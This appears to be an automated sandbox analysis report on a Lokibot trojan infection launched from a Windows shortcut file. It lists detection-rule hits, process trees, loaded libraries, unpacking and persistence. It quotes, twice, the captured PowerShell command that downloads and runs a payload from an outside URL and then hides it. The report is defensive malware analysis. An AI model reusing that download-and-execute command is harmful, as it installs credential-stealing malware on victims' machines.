Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: mjtjewi.exe.0.dr

Static PE information: Section: j1CM!e^U ZLIB complexity 1.0003301933811801

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@12/10@3/2

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

6_2_0040434D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\mjtjewi.exe

Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\mjtjewi.exe	Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Comprobante.lnk.lnk

LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\mjtjewi.exe

Unpacked PE file: 4.2.mjtjewi.exe.b70000.0.unpack j1CM!e^U:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';

Yara detected aPLib compressed binary

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR

Source: mjtjewi.exe.0.dr	Static PE information: section name: j1CM!e^U
Source: mjtjewi.exe.0.dr	Static PE information: section name:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFE7DE700BD pushad ; iretd	0_2_00007FFE7DE700C1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_00BB81B8 pushfd ; ret	4_2_00BB81BF
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_00BB79E2 push esp; retf	4_2_00BB79E8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01521503 push ss; retf	4_2_01521504
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01521522 push ebp; retf	4_2_01521523
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_00402AC0 push eax; ret	6_2_00402AD4
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_00402AC0 push eax; ret	6_2_00402AFC

Source: mjtjewi.exe.0.dr

Static PE information: section name: j1CM!e^U entropy: 7.999315698306394

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Tries to download and execute files (via powershell)

Source: unknown

Source: C:\Users\user\Desktop\mjtjewi.exe	File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Desktop\mjtjewi.exe			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
